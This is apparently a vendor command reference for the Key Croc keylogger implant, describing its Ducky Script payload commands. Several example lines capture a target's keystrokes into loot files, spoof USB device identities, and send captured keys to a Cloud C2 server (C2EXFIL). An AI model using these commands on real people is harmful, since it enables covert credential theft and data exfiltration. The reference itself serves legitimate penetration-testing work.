Key Croc payloads are easy to write with Ducky Script. They can be written in any standard text editor. From notepad on Windows to TextEdit on a Mac – even nano on Linux, the best text editor ever. These simple ascii files are processed by the Key Croc's payload framework. Payloads execute when the target types specified patterns of keystrokes. A payload can be as simple as saving keystrokes of interest, to an advanced array of attacks using multiple device emulation modes, complex pentest frameworks and specialized exploits.
Multiple payloads, each with a unique file name, may be loaded simultaneously from the Key Croc's udisk payloads folder.
In addition to Ducky Script, the Key Croc payloads are executed with bash. which means they can leverage this powerful shell scripting language. For example, conditional statements can be used to construct decision trees based on events, and text processing tools can be used to systematically extract typed key sequences of interest – storing them in variables for use later in the payload.
Payloads can take advantage of a number of Key Croc commands, in addition to the standard Linux tools, additional pre-installed tools like nmap and smbclient, or the optionally installed tools like metasploit, responder and impacket.
Included Ducky Script Commands
- MATCH – specifies a pattern that must be typed to trigger payload execution
- SAVEKEYS – saves next or last typed keys to a specified file when a MATCH is found
- QUACK – injects keystrokes using Ducky Script 2.0
- QUACKFILE – injects keystrokes from specified file
- ATTACKMODE – specifies which device type to emulate
- LED – controls the multi-color LED
- GET_VARS – returns useful variables for use in payload
Payload Control & Development
- RELOAD_PAYLOADS – instructs the payload framework to reingest payloads from disk
- CHECK_PAYLOADS – checks the MATCH and SAVEKEYS syntax of the loaded payloads
- RECORD_PAYLOAD – interactive payload recorder
- ENABLE_PAYLOAD – enables payload
- DISABLE_PAYLOAD – disables payload
- INSTALL_EXTRAS – installs optional third party tools
- KEYBOARD – reports if a keyboard is present or missing
- udisk – mount, unmount and format the udisk partition
- WAIT_FOR_KEYBOARD_ACTIVITY – halts payload until keyboard activity is detected
- WAIT_FOR_KEYBOARD_INACTIVITY – halts payload until keyboard is inactive for specified time
- WAIT_FOR_LOOT – halts payload until specified loot is received
Cloud C2 Commands
- C2NOTIFY – sends a notification to the configured Cloud C2 server
- C2EXFIL – sends a file to the configured Cloud C2 server
Command Quick Reference
MATCH <string or regular expression>
Will trigger payload execution when specified pattern is typed.
See the MATCH article for full usage.
SAVEKEYS </path/to/file> <NEXT | LAST> <number of keystrokes 1-255>
SAVEKEYS /root/loot/test.log NEXT 6
Will save the specified number of keys to a file – either before (LAST) or after (NEXT) the payload MATCH.
See the SAVEKEYS article for full usage.
QUACK <keystrokes to inject>
QUACK STRING hello world
Will inject keystrokes specified. See the QUACK article for full usage.
Will inject keystrokes from the specified file. Ducky Script commands in the specified file should not be prepended with Q or QUACK.
ATTACKMODE <modes> <options>
ATTACKMODE HID ECM_ETHERNET VID_0X05AC PID_0X021E MAN_Hak5 SN_1337
Will emulate a USB device from the specified modes and options. See the ATTACKMODE article for full usage.
Will control the multi-color LED. See the LED article for full usage.
Will return a set of useful variables which may be referenced in the payload
- $VID – Vendor ID cloned from attached keyboard or specified in config.txt
- $PID – Product ID cloned from attached keyboard or specified in config.txt
- $MAN – Manufacturer specified in config.txt
- $SN – Serial number specified in config.txt
- $PROD – Product string specified in config.txt
- $HOST_IP – IP address of Key Croc after executing an Ethernet ATTACKMODE
- $TARGET_IP – IP address of target after executing an Ethernet ATTACKMODE
- $TARGET_HOSTNAME – Host name of the target after executing an Ethernet ATTACKMODE
Note: The $LOOT variable is always available after MATCH triggers the payload. See the MATCH article for $LOOT details.
Will refresh the Key Croc framework with payload files from /root/udisk/payloads/
Will check the syntax of the payloads currently residing in /root/udisk/payloads/
Will parse each line entered, enabling interactive payload development with helpers.
Will enable the specified payload. After enabling a payload, issue RELOAD_PAYLOADS for the change to take effect.
After disabling a payload, issue RELOAD_PAYLOADS for the change to take effect.
Will install additional third party software such as metasploit, impacket and responder to the /tools/ directory.
Will return PRESENT or MISSING depending on whether a keyboard is attached.
udisk [ mount | unmount | remount | reformat ]
WAIT_FOR_KEYBOARD_ACTIVITY <refresh interval in seconds>
Will check for keyboard activity for each specified time interval, halting further payload execution until keyboard activity is detected. Example wait until there is keyboard activity within a 1 second window.
WAIT_FOR_KEYBOARD_INACTIVITY <seconds of inactivity required>
Will check for keyboard inactivity, halting further payload execution until the specified time has elapsed with no keyboard activity. Example will wait until there have been no keypresses for 5 minutes (300 seconds)
WAIT_FOR_LOOT </path/to/file> (optional)<refresh interval in seconds>
WAIT_FOR_LOOT /root/loot/captured_keys.txt 5
Will wait for the specified file to exist, or if already existing for the file line count to increase, halting further payload execution. Can be used in conjunction with SAVEKEYS NEXT, which will write the loot file when the number of specified keys have been typed. Example will wait until the captured_keys.txt file exists, checking every 5 seconds.
C2NOTIFY <INFO|WARN|ERROR> <MESSAGE>
C2NOTIFY INFO 'The cake is a lie'
Will send a notification to the configured Cloud C2 server. See the Configuring Cloud C2 article.
C2EXFIL (optional)STRING (required)<PATH> (optional)<SOURCE>
C2EXFIL STRING /root/loot/captured_keys.txt My_Payload
Will exfiltrate the specified file to the configured Cloud C2 server. See the Configuring Cloud C2 article.